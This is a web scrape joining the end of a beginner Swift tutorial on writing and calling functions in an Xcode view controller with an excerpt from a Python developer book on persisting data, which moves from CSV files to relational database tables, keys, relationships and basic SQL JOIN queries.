is the “closing bracket”. Every opening bracket must have a corresponding closing one. Or all hell breaks loose!
How would you use this amazing function?
var twoNumbersAdded = addTwoNumbers(10, 10)
This creates a variable called “twoNumbersAdded” and stores in it the value 20 (the result of our function adding 10 and 10 together).
Cool? Confusing? It’s ok, all will become clearer with more examples and time!
A better example
Create an app in Xcode and open the ViewController.swift file.
The “viewDidLoad” and the “didReceiveMemoryWarning” are both functions. Note neither have the “->” bit — this means they don’t return values, they just do their bit of code without returning a result.
Let’s create our own function and “call” it when the app is run. Before the final “closing bracket” in the file, type this:
func changeScreenColor(){
self.view.backgroundColor = UIColor.blue
}
This creates a function that will change the color of the main “view” in the ViewController. The “view” is actually an instance of UIView, another Class.
Now, in this function (which runs more or less immediately when the app is run):
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view, typically from a nib.
}
add this line, before the closing bracket:
changeScreenColor()
i.e.
This “calls” our function. Now run the app and you should see:
Yes! You just made something in an app change, using a function!
Let’s try out a couple more things. Add this new function which has a return type:
func getAwesomeName()->String{
return “Cohen the Barbarian”
}
and then add this lines to viewDidLoad to use the function:
let name : String = getAwesomeName()print(name)
so the full code looks like:
import UIKitclass ViewController: UIViewController { override func viewDidLoad() {
super.viewDidLoad() // Do any additional setup after loading the view, typically from a nib. changeScreenColor() let name : String = getAwesomeName()
print(name)
} override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning() // Dispose of any resources that can be recreated.
} func getAwesomeName()->String{
return "Cohen the Barbarian"
} func changeScreenColor(){
self.view.backgroundColor = UIColor.blue
}}
Run the app and the output should be in Xcode:
Let’s add one more function, this time with parameters:
func getBalance(name: String)->Int{
if name == "Commander Vimes" {
return 100
}else{
return 200
}
}
and call it in viewDidLoad:
let balance = getBalance(name: "Granny Ogg")print(balance)
Run the app and you should see:
The 200 is shown as the parameter we supplied was not equal to “Commander Vimes”. In fairness though, who would be?!
Summary
This post skimmed the tip of the iceberg of coding in Swift, but we all need to start somewhere. We’ll introduce more coding concepts gradually as we go along, so keep an eye out for the upcoming tutorials and guides!
This is part of appsandbiscuits — my new site to help teach app development to people with zero coding experience. If you liked it, please hit the little heart below, it’ll help other people come across the site! Thanks! Andy. | https://lemarquisofandy.medium.com/dont-panic-ios-basic-coding-ios-4-7adaf97700d3?source=post_internal_links---------3------------------------------- | CC-MAIN-2022-05 | en | refinedweb |
.
Usage
As a developer, you have access to a events system. You can find the documentation in the code or on
In a nutshell, you can create trigger events:
class Base(models.AbstractModel): _inherit = 'base' @api.model def create(self, vals): record = super(Base, self).create(vals) self._event('on_record_create').notify(record, fields=vals.keys()) return record
And subscribe listeners to the events:
from odoo.addons.component.core import Component from odoo.addons.component_event import skip_if class MagentoListener(Component): _name = 'magento.event.listener' _inherit = 'base.connector.listener' @skip_if(lambda self, record, **kwargs: self.no_connector_export(record)) def on_record_create(self, record, fields=None): """ Called when a record is created """ record.with_delay().export_record(fields=fields)
This module triggers 3 events:
- on_record_create(record, fields=None)
- on_record_write(record, fields=None)
- on_record_unlink(record)
Known issues / Roadmap. | https://pypi.org/project/odoo11-addon-component-event/ | CC-MAIN-2022-05 | en | refinedweb |
To reverse an array, swap the first element with the last element and the second element with second last element and so on if the array is of odd length leave the middle element as it is.
In short swap the 1st element with the 1st element from last, second element with the second element from last i.e. ith element with the ith element from the last you need to do this till you reach the midpoint of the array.
If i is the first element of the array (length of the array –i-1) will be the last element, therefore, swap array[i] with array[(length of the array –i-1)] from the start to the midpoint of the array:
public class ReversingAnArray { public static void main(String[] args) { int[] myArray = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 }; int size = myArray.length; for (int i = 0; i < size / 2; i++) { int temp = myArray[i]; myArray[i] = myArray[size - 1 - i]; myArray[size - 1 - i] = temp; } System.out.println("Array after reverse:: "); System.out.println(Arrays.toString(myArray)); } }
Array after reverse:: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1] | https://www.tutorialspoint.com/How-I-can-reverse-a-Java-Array | CC-MAIN-2022-05 | en | refinedweb |
Create a window group that other windows can join.
#include <screen/screen.h>
int screen_create_window_group(screen_window_t win, const char *name)
The handle of the window for which the group is created. This window must have been created with screen_create_window_type() with a type of SCREEN_APPLICATION_WINDOW or SCREEN_CHILD_WINDOW.
A unique string that will be used to identify the window group. Other than uniqueness, there are no other constraints on this name (for example, lower case and special characters are permitted). This string must be communicated to any window wishing to join the group as a child of win.
Function Type: Delayed Execution
This function creates a window group and assigns it to the specified window. The group is identified by the name string, which must be unique. The request will fail if another group was previously created with the same name.
Windows can parent only one group. Therefore, screen_create_window_group() can be called successfully only once for any given window. Additionally, only windows of certain types can parent a group of windows. Windows with a type of SCREEN_APPLICATION_WINDOW can parent windows of type SCREEN_CHILD_WINDOW and SCREEN_EMBEDDED_WINDOW. Windows with a type of SCREEN_CHILD_WINDOW can also create a group and parent windows of type SCREEN_EMBEDDED_WINDOW.
Once a group is created, it exists until the window that parents the group is destroyed. When a parent window is destroyed, all children are orphaned and made invisible. Destroying a child has no effect on the group other than removing the window from the group.
Group owners have privileged access to the windows that they parent. When windows join the group, the parent will receive a SCREEN_EVENT_CREATE that contains a handle to the child window that can be used by the parent to set properties or send events. Conversely, the parent gets notified when a child window gets destroyed. The parent window is expected to destroy its local copy of the window handle when one of its children is destroyed.
0 if request for the new window group was queued, or -1 if an error occurred (errno is set). | http://www.qnx.com/developers/docs/qnxcar2/topic/com.qnx.doc.qnxcar2.screen/topic/screen_create_window_group.html | CC-MAIN-2022-05 | en | refinedweb |
table of contents
NAME¶
sasl_getopt_t - Cyrus SASL documentation
SYNOPSIS¶
#include <sasl/sasl.h> int sasl_getopt_t(void *context,
const char *plugin_name,
const char *option,
const char ** result,
unsigned * len);
DESCRIPTION¶
-.
- context – is the SASL connection context
- plugin_name – is the plugin this value is for.
- option – is a string representing the option. A common option that all server applications should handle is(3) is called for a the connection it is associated with, or sasl_done(3) is called for global callbacks.
RETURN VALUE¶
SASL callback functions should return SASL return codes. See sasl.h for a complete list. SASL_OK indicates success.
Other return codes indicate errors and should be handled.
SEE ALSO¶
RFC 4422,:saslman:sasl(3), sasl_errors(3) sasl_callbacks(3)
AUTHOR¶
The Cyrus Team
1993-2021, The Cyrus Team | https://manpages.debian.org/bullseye/libsasl2-dev/sasl_getopt_t.3.en.html | CC-MAIN-2022-05 | en | refinedweb |
Closed Bug 1001994 Opened 8 years ago Closed 8 years ago
crash in libsystem
_kernel .dylib@0x15866 on printing with position: sticky
Categories
(Core :: Layout, defect, P3)
Tracking
()
mozilla33
People
(Reporter: martijn.martijn, Assigned: MatsPalmgren_bugz)
References
Details
(4 keywords, Whiteboard: [adv-main33+])
Crash Data
Attachments
(6 files)
See testcase, which crashes on printing or print preview. This bug was filed from the Socorro interface and is report bp-44611da7-eede-4bd8-98e8-73db42140427. ============================================================= 0 libsystem_kernel.dylib libsystem_kernel.dylib@0x15866 1 libsystem_pthread.dylib libsystem_pthread.dylib@0x235c 2 libc++abi.dylib libc++abi.dylib@0x27726 3 libsystem_c.dylib libsystem_c.dylib@0x5cb1a 4 libc++abi.dylib libc++abi.dylib@0x27726 5 libc++abi.dylib libc++abi.dylib@0xf31 6 XUL nsStyleContext::~nsStyleContext() obj-firefox/x86_64/dist/include/nsCOMPtr.h 7 libc++abi.dylib libc++abi.dylib@0x25447 8 XUL nsLayoutUtils::GetNearestScrollableFrame(nsIFrame*, unsigned int) layout/generic/nsQueryFrame.h 9 XUL mozilla::StickyScrollContainer::GetStickyScrollContainerForFrame(nsIFrame*) layout/generic/StickyScrollContainer.cpp 10 XUL nsFrame::DestroyFrom(nsIFrame*) layout/generic/nsFrame.cpp
Priority: -- → P3
Summary: crash in libsystem_kernel.dylib@0x15866 on printing → crash in libsystem_kernel.dylib@0x15866 on printing with position: sticky
This, like bug 973971, happens while processing a C++ exception.
We actually don't support C++ exceptions, though they can still happen anyway. See bug 975158. We'd presumably crash on *any* C++ exception. And probably the only way to "fix" a bug like this is to avoid throwing the exception to begin with (to find out why it's being thrown).
Unfortunately I can't reproduce this crash. I tested with today's m-c nightly on OS X 10.7.5, 10.8.5 and 10.9.2.
atos translation of top part of stack from comment #0: __pthread_kill (in libsystem_kernel.dylib) + 10 pthread_kill (in libsystem_pthread.dylib) + 92 char const* __cxxabiv1::(anonymous namespace)::parse_block_invoke<__cxxabiv1:: (anonymous namespace)::Db>(char const*, char const*, __cxxabiv1::(anonymous namespace)::Db&) ::test (in libc++abi.dylib) + 1129 abort (in libsystem_c.dylib) + 125 char const* __cxxabiv1::(anonymous namespace)::parse_block_invoke<__cxxabiv1:: (anonymous namespace)::Db>(char const*, char const*, __cxxabiv1::(anonymous namespace)::Db&) ::test (in libc++abi.dylib) + 1129 __cxa_bad_cast (in libc++abi.dylib) + 0 nsStyleContext::~nsStyleContext() __cxa_deleted_virtual (in libc++abi.dylib) + 0 ...
Group: core-security
It looks like we're calling a virtual method on a deallocated frame. STR: Print Preview the attached testcase, change the Scale between various % values a few times.
Corey, maybe you can take a look?
Flags: needinfo?(corey)
+cc: kip
I hadn't noticed that this was reproducible on Linux, but I can reproduce it per comment 5. What I see happening in the stack traces is: when destroying the sticky frame, we try to unregister it from its StickyScrollContainer. That requires first finding the scroll container frame, which I think in this document ought to be the nsHTMLScrollFrame corresponding to <html>, but I've no idea how that works in printing and gdb is being slightly uncooperative. Anyway, while walking up the frame tree in search of the scroll container, we hit that deallocated frame. I guess I would expect frame trees to be destroyed starting from the leaves, but maybe that doesn't hold here?
Flags: needinfo?(corey)
After removing some things from the file, I'm still able to reliably reproduce the crash by keyboard-scrolling through all the percentage scale options while print-previewing.
"Print Preview" is not a super-effective attack vector (sec-moderate?) but if we're screwing up the frame tree could it be made to happen in a non-print context? Often that seems to be the case, in which case this could be sec-critical. Jesse: do we hit position:sticky in you fuzzer often?
Flags: needinfo?(jruderman)
Yes, my fuzzer uses position:sticky all the time. But I've disabled testing of printing because my printing bugs never get fixed.
Flags: needinfo?(jruderman)
Can someone please take this issue and work on a patch?
Assignee: nobody → mats
The position:sticky frame is on an OverflowList of an inline, which may in some cases have a bogus parent frame pointer (because we reparent those lazily during reflow for performance reasons). But nsIFrame::DestroyFrom now depends on having a valid parent frame pointer chain to find the sticky controller:
The "if (overflowFrames)" check isn't needed but I think it's an optimization because it should rarely be non-null here. The eForDestroy value isn't strictly needed, since I could just pass zero and avoid the ReparentStyleContext part, but it's for documenting this case if more code is added here later that we could avoid for eForDestroy. This fixes the crash for me locally - I'll push to Try later after approval-to-land.
Attachment #8450605 - Flags: review?(roc)
Comment on attachment 8450553 [details] framedump + stack After debugging this a bit more I can see that the parent pointer we crash on is "Inline(span)(1)@7fffb9607550" (the first child of the "Block(ul)(1)@7fffb9606aa8"). So since that frame should have been destroyed normally, I'm a bit puzzled why it isn't poisoned...
OK, we're deleting the whole shell so we're not poisoning anything since it will free the whole arena soon anyway. So, the frame should be intact except for what the destructor does.
In both DEBUG and non-DEBUG builds on Linux64 I get the "pure virtual method called" which calls std::terminate() which raises an exception, which is fatal. Comment 1 to 4 sounds like the same happens on OSX. So those should be non-exploitable. I haven't tried Windows.
OS: Mac OS X → All
mozilla26 and later are affected. I don't know how to set "status-b2g-v*" because it's unclear to me what branches those are based on, ditto for status-seamonkey2.26.
status-b2g18: --- → unaffected
status-firefox30: --- → affected
status-firefox31: --- → affected
status-firefox32: --- → affected
status-firefox33: --- → affected
status-firefox-esr24: --- → unaffected
Keywords: regression
In a trunk DEBUG build on Windows I get "pure virtual function call" followed by a crash. FF30 on Windows does not crash at all.
Comment on attachment 8450605 [details] [diff] [review] fix [Security approval request comment] How easily could an exploit be constructed based on the patch? Not easily. Besides, it seems very unlikely to be exploitable anyway. I'm just asking for sec-approval in case I missed something above. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? No. Which older supported branches are affected by this flaw? The bug affects mozilla26 and later. If not all supported branches, which bug introduced the flaw? bug 886646 Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? The same patch should apply, if needed. How likely is this patch to cause regressions; how much testing does it need? Unlikely to cause problems.
Comment on attachment 8450605 [details] [diff] [review] fix It is a sec-low so it doesn't need sec-approval to land. Only High and Critical security bugs do. Check it in!
Isn't it odd that we've completed reflow and there's still something on the overflow list?
(In reply to David Baron [:dbaron] (UTC-7) (needinfo? for questions) from comment #25) > Isn't it odd that we've completed reflow and there's still something on the > overflow list? Indeed it is; I'm aware of it and made a patch along those lines but I figured it wasn't the root cause of this bug and would only wallpaper it. Filed bug 1035299.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla33
Whiteboard: [adv-main33+]
Confirmed crash in Fx31 release. Verified fixed in Fx33, release candidate.
Status: RESOLVED → VERIFIED
Group: core-security → core-security-release
Group: core-security-release
Pushed by mpalmgren@mozilla.com: crashtest.
Flags: in-testsuite+ | https://bugzilla.mozilla.org/show_bug.cgi?id=1001994 | CC-MAIN-2022-05 | en | refinedweb |
In my code where I receive data from Reuters, I am giving a milliseconds of 500. So at intervals of 500 milliseconds, it reads the data. Are we missing any data if we increase the time?
@liyarthomas your code does not show the event dispatch and callback handler. Application has to receive data from EMA not poll it. If the ticks are not removed from EMA fast enough, then queue will fill up and application will run out of heap memory.
Hi @liyarthomas
Depending on the volatility of the instruments you are consuming and the service you are consuming from, there could well be much higher update rates.
Are you using streaming requests or snapshot requests?
Can you confirm what you mean by 'at intervals of 500ms it reads the data' - how exactly are you controlling this?
The event callback handlers in EMA (onRefreshMsg, onUpdateMsg etc) are event driven and called as & when any new updates arrive from the server - provided that you are continuously dispatching events.
Are you limiting the calls to dispatch() to once every 500ms? If so, any updates received from the server could start building up in a queue and your callbacks will only receive the next one in the queue as and when dispatch is called. If you do not call dispatch often enough for a instrument that updates more frequently - you may not get all the updates...
Please explain how your interval reading is working....
We are using an Asynchronous server here which reads the data store every 200 milliseconds and publishing it into the zero MQ.
The event callback handlers in EMA are event driven and are called as and when any new updates arrives from server.
I have attached here just two files which does the following. But I have not attached the event driven appclient.
So what we wanted to know is that, as we are reading the datastore every 200ms, are we missing any ticks?
using namespace thomsonreuters::ema::access; using namespace thomsonreuters::ema::rdm; using namespace std; int main(int argc, char* argv[]) { try { // instantiate callback client mdsdemo::DataStore ds; mdsdemo::AppClient client(ds); //ip, port, interval, datastore mdsdemo::AsyncServer as("*", 40000, 1000, ds ); cout << "Connecting to market data server" << endl; // create OMM consumer OmmConsumer consumer( OmmConsumerConfig() .host("159.220.108.133:14002") .username("NJ2_03_RHB_SWVPNTRIAL01") ); cout << "Subscribing to market data" << endl; std::vector<string> rics = { "USDEUR=R","JPYUSD=R","USDGBP=R","USDAUD=R","CHFUSD=R", "CADUSD=R" }; for (const auto ric : rics) { //first setup datastore for the ric ds.AddStorage(ric, new mdsdemo::FxData()); // subscribe to Level1 market data consumer.registerClient( ReqMsg() // default subscription domain is MMT_MARKET_PRICE .serviceName("hEDD") .name(ric.c_str()), client); } //run asynchronously reading the data store every 1000 milliseconds and publishing into the //queue as.RunForEver(); } catch (const OmmException& excp) { cout << "Exception subscribing to market data: " << excp << endl; } return 0; }
#include <sstream> #include <iostream> #include <boost/bind.hpp> #include "AsyncServer.h" using std::cout; using std::endl; namespace mdsdemo { AsyncServer::AsyncServer(string ip, int port, long interval, DataStore & ds) :context_(1), pub_(context_, ZMQ_PUB), interval_(interval), ds_(ds) { std::stringstream ss; ss << "tcp://" << ip << ":" << port; pub_.bind(ss.str()); } AsyncServer::~AsyncServer() { } void AsyncServer::RunForEver() { boost::asio::deadline_timer t(io_, boost::posix_time::millisec(interval_)); t.async_wait(boost::bind(&AsyncServer::OnTimer, this, boost::asio::placeholders::error, &t)); io_.run(); } void AsyncServer::Publish() { try { std::string jsonData = "full "; jsonData += ds_.ToJsonFull(); zmq::message_t msg(jsonData.begin(), jsonData.end()); pub_.send(msg); cout << jsonData << endl; } catch (const std::exception & exp) { //TODO log errors } } void AsyncServer::OnTimer(const boost::system::error_code& /*e*/, boost::asio::deadline_timer* t) { Publish(); t->expires_at(t->expires_at() + boost::posix_time::millisec(interval_)); t->async_wait(boost::bind(&AsyncServer::OnTimer, this, boost::asio::placeholders::error, t)); } }
(JAVA) Does using interestAfterRefresh(false) remove the need for deregistering items with Elektron?
EMA CPP - Exception adding ric into OmmArray
Login Domain - Components and Elements in Login responses
Elektron - EMA version upgrade
When can we expect Visual Studio 2017 C++ Libraries in Elektron SDK? | https://community.developers.refinitiv.com/questions/25192/regarding-data.html | CC-MAIN-2022-05 | en | refinedweb |
Take 35% off The Well-Grounded Python Developer by entering fccfarrell into the discount code box at manning.com.
This article is about persisting application data over time. You don’t run the applications you use forever, and despite the stability of computer systems, they are shut down and restarted periodically.
Imagine using a complex spreadsheet and re-entering all the data every time you shut the application or computer down. Even with the enormous processing power a computer has, it would hardly be a helpful device if there was no way to restore the information entered into it.
The Other Half
As a developer, it’s easy to think of the application code you’re creating as the primary product of your efforts. But, in reality, your cool, essential application with all of its well thought out code is only half the story. The other, equally important half is the data your application helps the user work with. Modifying, transforming and providing insights into data your users are interested in is the raw material an application works with.
Maintaining Information over Time
The other half of a computer system’s versatility is the file system. A file system saves data to a storage medium independent of electrical power. Most personal computer systems maintain file systems on either mechanical or solid-state drives. These storage devices have file system structures layered over them by the operating system of the computer.
Application programs give meaning to the data in a file. For example, when a photo viewing application opens a JPEG image file, the user sees a picture. The photo application can interpret the contents of the file and generate the expected visual results.
If a user were to open the same JPEG image file with a text editor, they would see a large block of largely incomprehensible data. Most of the files in a file system are like this, making sense to the applications that can read and interpret them.
Any application needs to save and recall content to display to users. The content saved to the file system is in a format understood by the application.
Accessing Data
Before diving directly into database systems, let’s talk about storing data in a file in general. To do so, we’ll use something everyone who’s bought anything online is familiar with, customer orders for products. Later, we’ll use this idea to illustrate some issues when storing data to file systems.
To begin with, imagine an online store that only sells a single product to many customers. Each customer might create multiple orders for that single product. To make the data relatively easy to present in this article, we’ll keep the amount of information very low, the customer’s name, their address, the product name, and the quantity in the order.
A common format for data in a file system is the comma-delimited value format or CSV. A CSV file is easy to understand and has the advantage of being human-readable and accessible by computer systems.
A CSV file is a simple text file where each line of text is a record of data ending in a carriage return. A comma character separates the data elements in each line of text. The first line of a CSV file often contains the names of each comma-separated field in the remainder of rows of text in the file.
That’s pretty much it, no concept of data type for each element in a record. An application reads the CSV file and splits each comma-separated line of text into fields of text data.
The imaginary company selling only one product to each customer could save all of the customer information and their orders in a single CSV file:
This CSV file is sufficient to represent the customers, orders, and address where to ship them. The first field contains the customer’s name, the second their address, the third their zip code, the fourth field is the product name, and the last field is the quantity of the products in the order. Because the company only sells a single product, this could work.
Even in this example, you might notice a potential problem. There’s redundant data in the file. For example, customers and their addresses are represented multiple times for each separate order, as in the case of Joe and Mary.
We could resolve the problem by removing the redundancy and having only one record for each customer, and representing multiple orders in that same record. You could create more comma-separated fields containing the quantities, but this doesn’t work. Because there’s no way to know how many orders a customer will create, it would be difficult for an application reading the CSV file to know how many fields to expect.
We could pack multiple product and quantity fields into the single order field, but we’d need to use a delimiter distinct from a comma to separate the values. So instead, we use the pipe “|” character to separate orders and the dash “-“ character to separate the product from the quantity. Doing this allows you to maintain multiple orders per record so that an application can still parse the lines of text in the file.
Implementing this idea creates a CSV file like this:
This implementation reduces the redundancy in the file as well as its size. Reducing the redundancy comes at the cost of increased processing when reading and interpreting the data in this CSV file. The application will have to parse for the comma, the pipe, and the dash symbol delimiters in the order field.
Suppose our imaginary company decides to sell multiple products, and customers can ship an order to any address they want. Now customer orders need to contain the shipping address information, which nees its own delimiters within the field to stay distinct.
We could extend the CSV file in this way:
Adding more delimiters could work, but it’s getting silly with multiple data items to parse in the orders field. This approach also doesn’t scale well as adding more products makes the orders field even more complicated.
Resolving this problem means recognizing the logical divisions between the data elements to be stored. For example, a customer can ship multiple orders to different shipping addresses, and each order can contain multiple products and quantities.
Each customer can have multiple orders, but each order is related to only a single customer. Similarly, each address can be related to multiple orders, but each order will ship to only a single address.
Orders and products are a little more challenging. An order can contain multiple products, and a product can be part of multiple orders. To resolve this, we invent the concept of an order item. An item relates to an order and a product, providing this two-way connection.
We can break the data into separate CSV files along these logical lines, essentially where we’ve added additional delimiters in the text. Taking this action creates five CSV files: customer, address, product, order, and item. The five CSV files separate the data along the logical lines. Unfortunately, there’s no way to connect a customer to an order, an order to address, or an item to either an order or a product.
To connect the data, we need to create relationships between the rows of data in the files. We can do this by creating a unique identifying value for each row in every CSV file. At a minimum, the row identifier only needs to be unique across the rows in an individual CSV file.
We’ll add another column at the beginning of each row and assign an integer value incremented for each row. The integer value uniquely identifies each row of data in a CSV file, but there are still no relationships between the CSV files.
To create relationships, we add the unique identifier from one record in a CSV file to another to indicate the relationship between the two CSV files. For example, a single customer can create multiple orders, but each order only belongs to a single customer.
We’ll add the unique identifier as a new value to all the rows in the order CSV file that relate to that customer to create this relationship. This kind of relationship is called one-to-many; each customer is related to multiple orders, but each order relates to only a single customer.
There’s also another relationship we have to establish. Each order can consist of multiple products, and each product can relate to multiple orders. A relationship like this is called a many-to-many. Conceptually this is a many-to-one relationship combined with a one-to-many and is implemented by creating relationship associations.
To do this, we’ll create an item CSV file that contains the unique id’s from both the order and product CSV files for each item. In this way, an order can connect to multiple items and connect to multiple products.
The five CSV files to represent the information is presented below:
The diagram shows the five CSV files, their contents, and the relationships between them. Each file has a unique id value as the first field in each row of data. The structure shows the Customer, Product, and Address files have no redundant data. It also shows the Order and Item files contain relationship data primarily, aside from the unique id and the qty value in Item.
Because of the structure and contents of the CSV files, our imaginary company could continue to add new customers, add new products to sell, and addresses to ship to, all without creating unsustainable redundant information. The example program in
examples/01/main.py uses this information to create simple invoice PDF files for all the orders in the system. The diagram below shows
invoice_1.pdf with indications for the source of the data shown:
I won’t present the example program here as it’s available in the book. The program works by reading all the CSV files into memory and creating a
Transactions container class to hold the information. Next, the orders in the
Transactions class are inserted into the transaction information fields in a Jinja2 template. The resulting rendered HTML is converted to a PDF file.
The above ideas and implementation work but have significant limitations. Because the CSV files are read into memory, the number of customers, products, and orders are limited to the amount of memory the application has available.
The example program has only one use, to create a set of order invoices for all the orders in the system. There is no facility to search for an order, customer or product. Any additional use cases, like searching or reporting our imaginary company might want, requires quite a bit more programming development.
Our imaginary company would likely want to have multiple users interacting with the data, both customers and employees. Coordinating multiple access has to be handled by the application so the data stays consistent and uncorrupted. If multiple applications access the CSV files, this presents another level of complexity to coordinate that access, keep the data synchronized and current in all applications and prevent the files from becoming corrupted.
There’s also no standardized way to use the CSV files. The CSV files are shared easily enough, but anyone wanting to use them would need detailed knowledge of the structure of the files and the relationships implied by that structure. They’d also have to maintain that structure if they wanted to modify the data contents. One solution to the problems is to move the data to a database system.
Database Systems
Database systems allow you to persist data as well as the relationships between that data. One common type of database is the Relational Database Management System or RDBMS. RDBMS systems provide the functionality to create, update and delete tables stored within them. These tables are analogous to the two-dimensional tables represented by the CSV files used in the example above.
RDBMS systems also have the functionality to create and update the relationships between tables by connecting the unique id values across table boundaries.
One of the advantages of a database system over using files to persist information is that creating, updating, and maintaining the data is handled by the database. All the knowledge necessary to maintain the data is handled by the database.
Tables
The use of tables represents the data a database maintains. Conceptually tables in a database are two-dimensional collections of rows and columns.
Like the CSV files presented previously, the rows are the individual records, and the columns are the fields within a row. Unlike a CSV file where the columns are strings separated by a delimiter, the columns in database tables have defined data types. The data types supported depend on the particular database, but data types of text, integer, real (decimal numbers), and blobs (binary objects) are generally supported.
The CSV files that allowed our imaginary company to track customers, orders, and products were small enough to include diagrams, as was shown previously. However, in real systems, the number of rows and columns can be extensive, which wouldn’t lend itself to the same kind of diagrams.
Tables in a database can be represented graphically as part of an Entity Relationship Diagram, or ERD. Rather than show the rows and columns that make up a table, the column and data type information for a record is shown. As an example, here is the database table representing the customer information:
The diagram header is the table name, and each row represents a column in the database table. Here the three columns in the diagram provide information about the database column. The second is the column name, and the third is the column data type.
The first column in the diagram provides additional information about the column. In the example above, the first row has the abbreviation PK. PK is shorthand for Primary Key, which is the unique id associated with each row of data in the table.
The order CSV file contained nothing but unique id values, one for the row unique id and two others to connect to the customer and address CSV file rows. The ERD for the order table is presented here:
Just like the customer table has three columns describing the database columns of the table, the order table has three columns for the data it maintains. The new FK abbreviation is shorthand for Foreign Key. A Foreign Key creates a relationship between two tables by referencing the Primary Key of another table.
Relationships
As important as storing and modifying data is to any application, the relationships between the data are just as important. The updated CSV files enabled us to reduce the original single CSV files data redundancy.
The separation of distinct data into separate tables does mean there needs to be a way to reconnect related data. RDBMS systems establish relationships between multiple tables with the use of Primary and Foreign Keys.
The Primary Key in a database table is a column in a row (a record) whose value is unique across the entire table. It’s often the case the Primary Key column exists for the sole purpose of providing this unique id value and provides no information about the record itself.
Most RDBMS systems have functionality to create auto-incrementing integer values when new rows are inserted into a table. These make convenient Primary Key values that are assured to be unique across the table as new records are inserted into the table and the value increments.
The existence of Primary Keys, and their use as Foreign Keys in other tables, allows relationships to exist between tables.
One To Many
In our example, there is a relationship between customers and orders. A customer can create zero to many orders for products, but each order is related to only one customer. This kind of relationship is called One-To-Many.
To establish a One-To-Many relationship, the unique
customer_id value from the customer table is also present as a column of data in the order table as
customer_id. The
customer_id value is a Foreign Key relating to the customer table. Any number of order records can have the same
customer_id value, creating the One-To-Many relationship.
When creating a Foreign Key in a table, part of the definition given to the database engine is to what table the Foreign Key relates. The Foreign Key tells the database engine there’s a relationship and helps it provide the functionality to use that relationship.
Many To Many
Our imaginary company also establishes another kind of relationship. An order can have many items, each related to a product. At the same time, a product can be part of many items. A relationship like this is called a Many-To-Many.
Establishing a Many-To-Many relationship is more involved and, in some ways, can be thought of as a One-To-Many relationship connected to a Many-To-One relationship. To create this requires an association table that acts as the Many parts between the two just mentioned.
The item table creates the association between the order and product tables. The item table has a Foreign Key to the order table and a Foreign Key to the product table.
Transaction Database
The transaction database you’ll create uses a naming convention for the tables and the columns within those tables. The tables are named using singular nouns for what they contain: customer, product, etc. The naming convention seems counter-intuitive since a table has multiple records, and the plural version of the noun might seem more fitting.
The table is defined in terms of one row of data and the data types and meanings of the record’s columns. How the table is accessed can return one or more records, but the table itself is configured based on a single record.
Additionally, it can get surprisingly awkward to use plurals when naming tables. Plus, good developers are lazy, and the singular versions are shorter and require less typing when working with them.
The Primary Key columns are named using a convention of the table name appended with “_id”. While seemingly redundant and wordy as the Primary Key name, it’s quickly apparent the column is a Foreign Key when used in another table.
Creating an ERD for the transaction database generates this:
This diagram represents the transaction database table’s structure and the relationships between them using common database ERD notation and symbols. Notice how the connection between tables goes from Primary Key in one table to Foreign Key in another.
The connecting lines are all variations of One-To-Many relationships. The existence of the Item table creates the Many-To-Many relationship between the Order ⇔ Items ⇔ Product tables.
Creating, updating, and interacting with the data in an RDBMS system uses the Structured Query Language (SQL) most RDBMS systems provide.
Structured Query Language: SQL
Accessing the functionality of a database is standardized, so any programming language that has a library available to connect to the database can use it. This standardization makes the database much easier to share between applications than a proprietary system.
Much of the standardized functionality of RDBMS systems are exposed to the user by using Structured Query Language, or SQL. SQL interacts with an RDBMS system as a declarative programming language. A declarative language lets you express what you want a computer system to do and not explicitly instruct the system on how to perform that task.
One way to think about this would be going to a bakery and asking for a cake. You expect that the baker will give you a cake, not ask for a recipe make a cake.
Getting Data
You’ll be creating the transaction database later in this article, but here I’ll show some SQL queries to access data. This SQL statement:
SELECT * FROM customer;
Returns these results:
customer_id name ----------- ---------- 1 Joe 2 Mary 3 Sue
The SQL command keywords are in uppercase, which is just a convention. The statement asks the database to return all rows from the customer table. The “
*” character is a wildcard to get all columns for each row returned. The “
;” character at the end of the SQL statement is the terminator for the command.
This SQL query asks for only the names in the customer database sorted in descending alphabetical order:
SELECT name FROM customer ORDER BY name DESC; name ---------- Sue Mary Joe
SQL also provides functions that transform and use the data. The statement below returns the number of customers:
SELECT COUNT(*) AS 'Total Customers' FROM customer; Total Customers --------------- 3
The
COUNT function returns the total number of results produced by the query and assigns that value to an alias ‘Total Customers’ used as the column heading for the output results.
Using Relationships
Because the tables in the transaction database represent normalized data without redundancies, making interesting queries requires using relationships. In this SQL statement, the customers, all the addresses used for their orders, the number of times they’ve used an address for an order, are returned and sorted alphabetically by name:
SELECT c.name, a.street, a.zipcode, COUNT(c.name) AS 'Times Used' FROM CUSTOMER c JOIN 'order' o ON o.customer_id = c.customer_id JOIN address a ON a.address_id = o.address_id GROUP BY a.street ORDER BY c.name; name street zipcode Times Used ---------- ---------- ---------- ---------- Joe 12 Main St 12345 2 Mary 127 Margol 40322 1 Mary 41 Orange 40321 1 Sue 212 Grove 34213 1
Here the SQL statement spans multiple lines, which works fine as the statement isn’t completed until the final “;” character. As before, only some values from the tables are returned, but those values span multiple tables.
Initially, the query starts at the customer table and assigns it to an alias shorthand used in other parts of the query to reduce ambiguity. To get the customer address used with each order, the query needs to use the relationships between the customer, order, and address tables. Using the “
JOIN” keyword achieves this. It tells the database how to connect one table to another using the Primary Key from one to the Foreign Key of another.
The Primary Key from one table must equal the Foreign Key of the other for that row to be part of the results. The “
ON” keyword provides the condition to be met to include the data.
Notice the ‘order’ table is in single quotes in the first “
JOIN” statement. The single quotes are necessary because the word order is a SQL keyword; placing it in single quotes tells SQL to interpret ‘order’ as the table name rather than a keyword.
The “
GROUP BY a.street” tells SQL to aggregate the results based on identical street values. The results returned indicate this. For example, Joe has two orders but used the same address for both. Mary also has two orders but used a different address for each one.
The SQL to get the data to build invoices for all the orders our imaginary company has is written like this:
SELECT c.name, a.street, a.zipcode, o.order_id, p.name, i.qty FROM 'order' o JOIN customer c ON c.customer_id = o.customer_id JOIN address a ON a.address_id = o.address_id JOIN item i ON o.order_id = i.order_id JOIN product p ON p.product_id = i.product_id
